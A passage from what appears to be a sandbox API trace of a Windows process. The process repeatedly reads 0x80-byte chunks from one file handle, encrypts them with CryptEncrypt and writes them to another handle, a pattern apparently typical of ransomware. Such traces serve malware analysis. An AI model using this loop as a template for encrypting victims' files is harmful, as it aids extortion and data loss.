lpOverlapped=0x0) returned 1 [0040.743] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.743] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.743] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.743] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.744] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.744] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.744] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.744] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.744] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.744] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.744] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.744] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.744] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.745] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.746] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.746] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.746] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.746] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.746] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.746] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.746] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.822] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.823] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.823] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.823] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.823] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.823] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.823] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.823] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.823] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.823] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.824] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.824] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.824] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.824] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.824] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.824] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.824] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, 